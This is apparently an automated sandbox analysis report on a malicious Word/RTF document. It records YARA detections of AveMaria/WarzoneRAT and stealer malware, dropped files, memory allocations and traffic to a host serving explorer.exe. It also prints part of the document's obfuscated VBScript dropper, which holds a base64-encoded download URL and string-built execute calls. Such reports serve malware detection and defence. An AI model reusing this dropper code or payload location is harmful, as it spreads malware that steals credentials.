Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: login.929389.ankura.us
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Installs a raw input device (often for capturing keystrokes)
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Document contains OLE streams with names of living off the land binaries
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725425945/\x1Ole10Native' : :....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT..... ...C:\9jkepaD\DZdtfhgYgeghD{.scT.s....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "ex" + "ecute(var1)"..
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725426018/\x1Ole10Native' : ;....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT.....6...C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{.scT.w:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "e
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe Jump to dropped file
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Jump to dropped file
Found suspicious RTF objects
Source: DZdtfhgYgeghD{.scT Static RTF information: Object: 0 Offset: 000007D1h DZdtfhgYgeghD{.scT
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001900C8 8_2_001900C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197650 8_2_00197650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197219 8_2_00197219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197228 8_2_00197228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197640 8_2_00197640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001907EE 8_2_001907EE
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_0131A760 8_2_0131A760
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_01310048 8_2_01310048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_05890048 8_2_05890048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B00C8 20_2_002B00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7650 20_2_002B7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7228 20_2_002B7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7219 20_2_002B7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7640 20_2_002B7640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B07E0 20_2_002B07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E09850 20_2_04E09850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00042 20_2_04E00042
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00048 20_2_04E00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00048 20_2_05F00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00038 20_2_05F00038
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F00C8 29_2_001F00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7650 29_2_001F7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7219 29_2_001F7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7228 29_2_001F7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F07E0 29_2_001F07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01329850 29_2_01329850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01320048 29_2_01320048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500048 29_2_05500048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500006 29_2_05500006
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: explorer[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: explorer.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eDdYRRbouy.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Yara signature match
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
